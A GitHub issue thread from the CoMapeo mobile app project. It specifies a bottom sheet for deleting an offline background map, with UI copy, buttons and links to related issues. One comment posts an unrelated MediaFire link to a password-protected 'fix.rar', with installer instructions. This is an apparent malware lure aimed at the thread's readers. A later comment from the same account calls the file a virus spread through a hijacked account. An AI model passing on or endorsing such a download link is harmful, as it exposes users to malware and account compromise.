### ISSUE TITLE
Replace or Remove Map

### ISSUE THREAD

**Issue by ximenabb** [digidem/comapeo-mobile#624]
**Description**
Goal : Improved workflow for importing a background map into CoMapeo, by allowing the user to pick the background map file from a file-picker in the app, rather than requiring the user to place the background map file in a specific location
An interim solution until the Map Manager feature is brought to CoMapeo
To note : 
- Coordinator and Particpants can upload, replace or remove a map
- Accepted file types are .mbttiles, .mappackage

Relates to https://github.com/digidem/comapeo-mobile/issues/623 https://github.com/digidem/comapeo-mobile/issues/622

**Todo**
<img width="319" alt="Screen Shot 2024-08-26 at 12 45 35 PM" src="https://github.com/user-attachments/assets/5357ccb3-8f6e-4f35-8199-0c1ab1a81a19">

- [ ] Display bottom sheet as designed
- [ ] Use copy _Delete Offline Map?_
- [ ] _This will delete the map and its offline areas. No collected observation data will be deleted.  This cannot be undone._ 
- [ ] Add **Delete Map** button
- [ ] If clicked, go to Screen 1 https://github.com/digidem/comapeo-mobile/issues/623
- [ ] Add **Close** button
- [ ] If clicked, go to Screen 4 https://github.com/digidem/comapeo-mobile/issues/623

**Design**
https://www.figma.com/design/iUeC0Qzhb4H0unuPfxQAsM/(Mobile)-CoMapeo?node-id=2179-1778&t=pHGODPSppOLjQUPF-0

**Comment by MinecraftEarthVillage** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by MinecraftEarthVillage** [comment]
不要下载我前段时间发的文件，那不是我发的，是另一个人控制我，如果你使用了这个病毒文件，你也会被控制，并且疯狂转发这个病毒
Don't download the file I sent some time ago, it wasn't me, but another person controlled me. If you use this virus file, you will also be controlled and forward this virus crazily.
